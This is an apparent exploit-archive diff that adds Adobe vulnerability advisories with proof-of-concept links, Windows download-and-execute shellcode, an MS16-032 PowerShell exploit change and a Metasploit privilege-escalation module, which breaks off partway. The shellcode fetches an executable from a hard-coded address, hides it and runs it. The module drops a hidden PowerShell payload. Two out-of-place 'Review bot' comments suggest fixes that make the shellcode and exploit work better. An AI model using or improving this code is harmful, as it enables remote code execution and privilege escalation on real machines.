@@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4206 +# COSIG-2016-25 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. 
+ +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40100.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40101.txt b/platforms/multiple/dos/40101.txt new file mode 100755 index 000000000..113e3d03d --- /dev/null +++ b/platforms/multiple/dos/40101.txt 
@@ -0,0 +1,56 @@ +##################################################################################### + +# Application: Adobe Acrobat Reader DC +# Platforms: Windows,OSX +# Versions: 15.016.20045 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE: CVE-2016-4201 +# COSIG-2016-24 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ +Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF). + +(https://en.wikipedia.org/wiki/Adobe_Acrobat) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe fixed the issue (APSB16-26); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== +The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction +that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data. 
+ +##################################################################################### + +=========== +4) POC +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40101.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40102.txt b/platforms/multiple/dos/40102.txt new file mode 100755 index 000000000..d9e1b7366 --- /dev/null +++ b/platforms/multiple/dos/40102.txt 
@@ -0,0 +1,59 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE-2016-4179 +# COSIG-2016-23 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. 
+ +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +============================ +2) Rapport de Coordination +============================ + +2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40102.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40103.txt b/platforms/multiple/dos/40103.txt new file mode 100755 index 000000000..6f4710d8a --- /dev/null +++ b/platforms/multiple/dos/40103.txt 
@@ -0,0 +1,59 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Sébastien Morin of COSIG +# Website: https://cosig.gouv.qc.ca/en/advisory/ +# Twitter: @COSIG_ +# Date: July 12, 2016 +# CVE-2016-4175 +# COSIG-2016-22 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +================ +1) Introduction +================ + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== + +2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT; +2016-06-08: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data. 
+ +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40103.zip + +#################################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40104.txt b/platforms/multiple/dos/40104.txt new file mode 100755 index 000000000..cb5da6b96 --- /dev/null +++ b/platforms/multiple/dos/40104.txt 
@@ -0,0 +1,57 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Francis Provencher of COSIG +# Website: https://cosig.gouv.qc.ca/avis/ +# Twitter: @COSIG_ +# Date: 12 juillet 2016 +# CVE-2016-4177 +# COSIG-2016-21 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. 
+ +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT; +2016-05-17: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data. + +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40104.zip + +############################################################################### \ No newline at end of file diff --git a/platforms/multiple/dos/40105.txt b/platforms/multiple/dos/40105.txt new file mode 100755 index 000000000..8f31aa959 --- /dev/null +++ b/platforms/multiple/dos/40105.txt 
@@ -0,0 +1,57 @@ +##################################################################################### + +# Application: Adobe Flash Player +# Platforms: Windows,OSX +# Versions: 22.0.0.192 and earlier +# Author: Francis Provencher of COSIG +# Website: https://cosig.gouv.qc.ca/avis/ +# Twitter: @COSIG_ +# Date: 12 juillet 2016 +# CVE-2016-4176 +# COSIG-2016-20 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia. + +(https://en.wikipedia.org/wiki/Adobe_Flash_Player) + +##################################################################################### + +==================== +2) Report Timeline +==================== +2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT; +2016-05-17: Adobe PSIRT confirm this vulnerability; +2016-07-12: Adobe publish a patch (APSB16-25); +2016-07-12: Advisory released by COSIG; + +##################################################################################### + +===================== +3) Technical details +===================== + +The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction +visiting a Web page or open a specially crafted SWF file, which contains ‘TAG’ invalid data. 
+ +##################################################################################### + +=========== +4) POC: +=========== + +https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40105.zip + +############################################################################### \ No newline at end of file diff --git a/platforms/win32/shellcode/40094.c b/platforms/win32/shellcode/40094.c new file mode 100755 index 000000000..abf2e111b --- /dev/null +++ b/platforms/win32/shellcode/40094.c 
@@ -0,0 +1,432 @@ +/* + Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode + Date : 12-07-2016 + Author : Roziul Hasan Khan Shifat + Tested on: Windows 7 x86 + + +*/ + +/* + + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c9 xor %ecx,%ecx + 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 6: 8b 40 0c mov 0xc(%eax),%eax + 9: 8b 70 14 mov 0x14(%eax),%esi + c: ad lods %ds:(%esi),%eax + d: 96 xchg %eax,%esi + e: ad lods %ds:(%esi),%eax + f: 8b 48 10 mov 0x10(%eax),%ecx + 12: 8b 59 3c mov 0x3c(%ecx),%ebx + 15: 01 cb add %ecx,%ebx + 17: 8b 5b 78 mov 0x78(%ebx),%ebx + 1a: 01 cb add %ecx,%ebx + 1c: 8b 73 20 mov 0x20(%ebx),%esi + 1f: 01 ce add %ecx,%esi + 21: 31 d2 xor %edx,%edx + +00000023 : + 23: 42 inc %edx + 24: ad lods %ds:(%esi),%eax + 25: 01 c8 add %ecx,%eax + 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 2d: 75 f4 jne 23 + 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 36: 75 eb jne 23 + 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 3f: 75 e2 jne 23 + 41: 8b 73 1c mov 0x1c(%ebx),%esi + 44: 01 ce add %ecx,%esi + 46: 8b 14 96 mov (%esi,%edx,4),%edx + 49: 01 ca add %ecx,%edx + 4b: 31 f6 xor %esi,%esi + 4d: 89 d6 mov %edx,%esi + 4f: 89 cf mov %ecx,%edi + 51: 31 c0 xor %eax,%eax + 53: 50 push %eax + 54: 68 61 72 79 41 push $0x41797261 + 59: 68 4c 69 62 72 push $0x7262694c + 5e: 68 4c 6f 61 64 push $0x64616f4c + 63: 54 push %esp + 64: 51 push %ecx + 65: ff d2 call *%edx + 67: 83 c4 0c add $0xc,%esp + 6a: 31 c9 xor %ecx,%ecx + 6c: 68 6c 6c 41 41 push $0x41416c6c + 71: 88 4c 24 02 mov %cl,0x2(%esp) + 75: 68 6f 6e 2e 64 push $0x642e6e6f + 7a: 68 75 72 6c 6d push $0x6d6c7275 + 7f: 54 push %esp + 80: ff d0 call *%eax + 82: 83 c4 0c add $0xc,%esp + 85: 31 c9 xor %ecx,%ecx + 87: 68 65 41 42 42 push $0x42424165 + 8c: 88 4c 24 02 mov %cl,0x2(%esp) + 90: 68 6f 46 69 6c push $0x6c69466f + 95: 68 6f 61 64 54 push $0x5464616f + 9a: 68 6f 77 6e 6c push $0x6c6e776f + 9f: 68 55 52 4c 44 push $0x444c5255 + a4: 54 push 
%esp + a5: 50 push %eax + a6: ff d6 call *%esi + a8: 83 c4 14 add $0x14,%esp + ab: 50 push %eax + +000000ac : + ac: 58 pop %eax + ad: 31 c9 xor %ecx,%ecx + af: 51 push %ecx + b0: 68 2e 65 78 65 push $0x6578652e + b5: 68 6d 70 6c 65 push $0x656c706d + ba: 68 30 2f 73 61 push $0x61732f30 + bf: 68 36 2e 31 33 push $0x33312e36 + c4: 68 36 38 2e 38 push $0x382e3836 + c9: 68 39 32 2e 31 push $0x312e3239 + ce: 68 3a 2f 2f 31 push $0x312f2f3a + d3: 68 68 74 74 70 push $0x70747468 + d8: 54 push %esp + d9: 59 pop %ecx + da: 31 db xor %ebx,%ebx + dc: 53 push %ebx + dd: 68 2e 65 78 65 push $0x6578652e + e2: 68 70 79 6c 64 push $0x646c7970 + e7: 54 push %esp + e8: 5b pop %ebx + e9: 31 d2 xor %edx,%edx + eb: 50 push %eax + ec: 52 push %edx + ed: 52 push %edx + ee: 53 push %ebx + ef: 51 push %ecx + f0: 52 push %edx + f1: ff d0 call *%eax + f3: 59 pop %ecx + f4: 83 c4 2c add $0x2c,%esp + f7: 31 d2 xor %edx,%edx + f9: 39 d0 cmp %edx,%eax + fb: 51 push %ecx + fc: 75 ae jne ac + fe: 5a pop %edx + ff: 31 d2 xor %edx,%edx + 101: 68 73 41 42 42 push $0x42424173 + 106: 88 54 24 02 mov %dl,0x2(%esp) + 10a: 68 62 75 74 65 push $0x65747562 + 10f: 68 74 74 72 69 push $0x69727474 + 114: 68 69 6c 65 41 push $0x41656c69 + 119: 68 53 65 74 46 push $0x46746553 + 11e: 54 push %esp + 11f: 57 push %edi + 120: ff d6 call *%esi + 122: 83 c4 14 add $0x14,%esp + 125: 31 c9 xor %ecx,%ecx + 127: 51 push %ecx + 128: 68 2e 65 78 65 push $0x6578652e + 12d: 68 70 79 6c 64 push $0x646c7970 + 132: 54 push %esp + 133: 59 pop %ecx + 134: 31 d2 xor %edx,%edx + 136: 83 c2 02 add $0x2,%edx + 139: 52 push %edx + 13a: 51 push %ecx + 13b: ff d0 call *%eax + 13d: 83 c4 08 add $0x8,%esp + 140: 31 c9 xor %ecx,%ecx + 142: 68 78 65 63 41 push $0x41636578 + 147: 88 4c 24 03 mov %cl,0x3(%esp) + 14b: 68 57 69 6e 45 push $0x456e6957 + 150: 54 push %esp + 151: 57 push %edi + 152: ff d6 call *%esi + 154: 83 c4 08 add $0x8,%esp + 157: 31 c9 xor %ecx,%ecx + 159: 51 push %ecx + 15a: 68 2e 65 78 65 push $0x6578652e + 15f: 68 70 79 6c 
64 push $0x646c7970 + 164: 54 push %esp + 165: 59 pop %ecx + 166: 31 d2 xor %edx,%edx + 168: 52 push %edx + 169: 51 push %ecx + 16a: ff d0 call *%eax + 16c: 83 c4 08 add $0x8,%esp + 16f: 31 c9 xor %ecx,%ecx + 171: 68 65 73 73 41 push $0x41737365 + 176: 88 4c 24 03 mov %cl,0x3(%esp) + 17a: 68 50 72 6f 63 push $0x636f7250 + 17f: 68 45 78 69 74 push $0x74697845 + 184: 54 push %esp + 185: 57 push %edi + 186: ff d6 call *%esi + 188: ff d0 call *%eax + + +*/ + + + +/* + +section .text + global _start +_start: + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;Eax=PEB +mov eax,[eax+0xc] ;eax=PEB.Ldr +mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov ecx,[eax+0x10] ;ecx=kernel32.dll base address +;------------------------------------ + +mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew +add ebx,ecx ;ebx=PE HEADER +mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress +add ebx,ecx ;IMAGE_EXPORT_DIRECTORY + +mov esi,[ebx+0x20] ;AddressOfNames +add esi,ecx +;------------------------------------------ +xor edx,edx + +count: +inc edx +lodsd +add eax,ecx +cmp dword [eax],'GetP' +jnz count +cmp dword [eax+4],'rocA' +jnz count +cmp dword [eax+8],'ddre' +jnz count + +;--------------------------------------------- + +mov esi,[ebx+0x1c] ;AddressOfFunctions +add esi,ecx + +mov edx,[esi+edx*4] +add edx,ecx ;edx=GetProcAddress() + +;----------------------------------------- + +xor esi,esi +mov esi,edx ;GetProcAddress() +mov edi,ecx ;kernel32.dll + +;------------------------------------ +;finding address of LoadLibraryA() +xor eax,eax +push eax +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ecx + +call edx + +;------------------------ +add esp,12 +;----------------------------- + +;LoadLibraryA("urlmon.dll") +xor ecx,ecx + +push 0x41416c6c +mov [esp+2],byte cl +push 0x642e6e6f +push 0x6d6c7275 + +push esp +call eax + +;----------------------- + +add esp,12 +;----------------------- +;finding address of URLDownloadToFileA() +xor ecx,ecx +push 
0x42424165 +mov [esp+2],byte cl +push 0x6c69466f +push 0x5464616f +push 0x6c6e776f +push 0x444c5255 + +push esp +push eax +call esi + +;------------------------ +add esp,20 +push eax +;--------------------------------------- +;URLDownloadToFileA(NULL,url,save as,0,NULL) +download: +pop eax +xor ecx,ecx +push ecx + +;----------------------------- +;change it to file url + +push 0x6578652e +push 0x656c706d +push 0x61732f30 +push 0x33312e36 +push 0x382e3836 +push 0x312e3239 +push 0x312f2f3a +push 0x70747468 +;----------------------------------- + + +push esp +pop ecx ;url http://192.168.86.130/sample.exe + +xor ebx,ebx +push ebx + +;------------------------ +;save as (no need change it.if U want to change it,do it) +push 0x6578652e +push 0x646c7970 +;------------------------------- +push esp ;pyld.exe +pop ebx ;save as + +xor edx,edx +push eax +push edx +push edx +push ebx +push ecx +push edx + +call eax + +;------------------------- + +pop ecx +add esp,44 +xor edx,edx +cmp eax,edx +push ecx +jnz download ;if it fails to download , retry contineusly +;------------------ +pop edx + +;----------------------- +;Finding address of SetFileAttributesA() +xor edx,edx + + +push 0x42424173 +mov [esp+2],byte dl +push 0x65747562 +push 0x69727474 +push 0x41656c69 +push 0x46746553 + +push esp +push edi + +call esi + +;-------------------------------- + +add esp,20 ;U must adjust stack or it will crash +;-------------------- +;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN) +xor ecx,ecx +push ecx +push 0x6578652e +push 0x646c7970 + +push esp +pop ecx + +xor edx,edx +add edx,2 ;FILE_ATTRIBUTE_HIDDEN + +push edx +push ecx + +call eax + +;------------------- + +add esp,8 +;--------------------------- + +;finding address of WinExec() +xor ecx,ecx + +push 0x41636578 +mov [esp+3],byte cl +push 0x456e6957 + +push esp +push edi +call esi + +;---------------------- + +add esp,8 + +;------------------------ +;calling WinExec("pyld.exe",0) +xor ecx,ecx +push ecx +push 0x6578652e 
+push 0x646c7970 + +push esp +pop ecx + +xor edx,edx +push edx +push ecx + +call eax +;------------------------- + +add esp,8 +;----------------------------- + +;finding address of ExitProcess() +xor ecx,ecx +push 0x41737365 +mov [esp+3],byte cl +push 0x636f7250 +push 0x74697845 + +push esp +push edi + +call esi + +;-------------- +call eax + + + +*/ + +#include +#include + +char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0"; + +main() +{ 
+printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1 index fe840a96c..1b5fcd2a8 100755 --- a/platforms/windows/local/39719.ps1 +++ b/platforms/windows/local/39719.ps1 @@ -207,7 +207,7 @@ function Invoke-MS16-032 { } function Get-SystemToken { - echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" + echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" $CallResult = [Kernel32]::SuspendThread($hThread) if ($CallResult -ne 0) { @@ -278,8 +278,8 @@ function Invoke-MS16-032 { $hThread = Get-ThreadHandle # If no thread handle is captured, the box is patched - if (!$hThread) { - echo "[!] No valid thread handles were captured, exiting!`n" + if ($hThread -eq 0) { + echo "[!] No valid thread handle was captured, exiting!`n" Return } else { echo "[?] Done, using thread handle: $hThread" @@ -288,7 +288,7 @@ function Invoke-MS16-032 { # Get handle to SYSTEM access token Get-SystemToken - # If we fail a check in Get-SystemToken, skip loop + # If we fail a check in Get-SystemToken, exit if ($SysTokenHandle -eq 0) { Return } diff --git a/platforms/windows/local/40107.rb b/platforms/windows/local/40107.rb new file mode 100755 index 000000000..8529db010 --- /dev/null +++ b/platforms/windows/local/40107.rb 
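Review bot: The two `#include` directives above the `shellcode[]` array name no header, so the harness as shown does not compile; `printf` and `strlen` need `#include <stdio.h>` and `#include <string.h>` (the header names were probably lost when the text was extracted — confirm against the original file). `main()` is declared without a return type, which relies on implicit int and is rejected by C99 and later; `int main(void)` with a trailing `return 0;` would build cleanly on current compilers. The `%ld` conversion with the `(long)` cast is correct but `%zu` on the raw `size_t` would avoid the cast.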
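Review bot: Tightening `if (!$hThread)` to `if ($hThread -eq 0)` in the second hunk narrows the patched-box check: in PowerShell `$null -eq 0` evaluates to `$False`, so if `Get-ThreadHandle` can return `$null` or no value rather than a literal `0` (its body is outside the hunk, so this is inferred), the script now takes the `else` branch and continues with an empty handle. The `-eq 0` form presumably exists to catch an `[IntPtr]` zero that `!` did not; keeping both conditions, `if (-not $hThread -or $hThread -eq 0) {`, covers both cases. The enclosing function `Invoke-MS16-032` starts and ends outside the hunk.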
@@ -0,0 +1,195 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/payload_generator' +require 'msf/core/exploit/powershell' +require 'rex' + +class MetasploitModule < Msf::Exploit::Local + + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Process + include Msf::Post::File + include Msf::Post::Windows::ReflectiveDLLInjection + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation', + 'Description' => %q{ + This module exploits the lack of sanitization of standard handles in Windows' Secondary + Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 + 32 and 64 bit. This module will only work against those versions of Windows with + Powershell 2.0 or later and systems with two or more CPU cores. 
+ }, + 'License' => BSD_LICENSE, + 'Author' => + [ + 'James Forshaw', # twitter.com/tiraniddo + 'b33f', # @FuzzySec, http://www.fuzzysecurity.com' + 'khr0x40sh' + ], + 'References' => + [ + [ 'MS', 'MS16-032'], + [ 'CVE', '2016-0099'], + [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ], + [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 30, + 'EXITFUNC' => 'thread' + }, + 'DisclosureDate' => 'Mar 21 2016', + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => + [ + # Tested on (32 bits): + # * Windows 7 SP1 + [ 'Windows x86', { 'Arch' => ARCH_X86 } ], + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 8 + # * Windows 2012 + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'DefaultTarget' => 0 + )) + + register_advanced_options( + [ + OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]), + OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]), + # How long until we DELETE file, we have a race condition here, so anything less than 60 + # seconds might break + OptInt.new('TIMEOUT', [false, 'Execution timeout', 60]) + ], self.class) + end + + def get_arch + arch = nil + + if sysinfo["Architecture"] =~ /(wow|x)64/i + arch = ARCH_X86_64 + elsif sysinfo["Architecture"] =~ /x86/i + arch = ARCH_X86 + end + + arch + end + + def check + os = sysinfo["OS"] + + if os !~ /win/i + # Non-Windows systems are definitely not affected. + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Detected + end + + def exploit + if is_system? 
+ fail_with(Failure::None, 'Session is already elevated') + end + + arch1 = get_arch + if check == Exploit::CheckCode::Safe + print_error("Target is not Windows") + return + elsif arch1 == nil + print_error("Architecture could not be determined.") + return + end + + # Exploit PoC from 'b33f' + ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1') + vprint_status("PS1 loaded from #{ps_path}") + ms16_032 = File.read(ps_path) + + cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe' + + if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64 + cmdstr.gsub!("System32","SYSWOW64") + print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell") + vprint_warning("#{cmdstr}") + end + + # payload formatted to fit dropped text file + payl = cmd_psh_payload(payload.encoded,payload.arch,{ + encode_final_payload: false, + remove_comspec: true, + method: 'old' + }) + + payl.sub!(/.*?(?=New-Object IO)/im, "") + payl = payl.split("';$s.")[0] + payl.gsub!("''","'") + payl = "$s=#{payl}while($true){Start-Sleep 1000};" + + @upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt" + path = datastore['W_PATH'] || pwd + @upfile = "#{path}\\#{@upfile}" + fd = session.fs.file.new(@upfile,"wb") + print_status("Writing payload file, #{@upfile}...") + fd.write(payl) + fd.close + psh_cmd = "IEX `$(gc #{@upfile})" + + #lpAppName + ms16_032.gsub!("$cmd","\"#{cmdstr}\"") + #lpcommandLine - capped at 1024b + ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"") + + print_status('Compressing script contents...') + ms16_032_c = compress_script(ms16_032) + + if ms16_032_c.size > 8100 + print_error("Compressed size: #{ms16_032_c.size}") + error_msg = "Compressed size may cause command to exceed " + error_msg += "cmd.exe's 8kB character limit." 
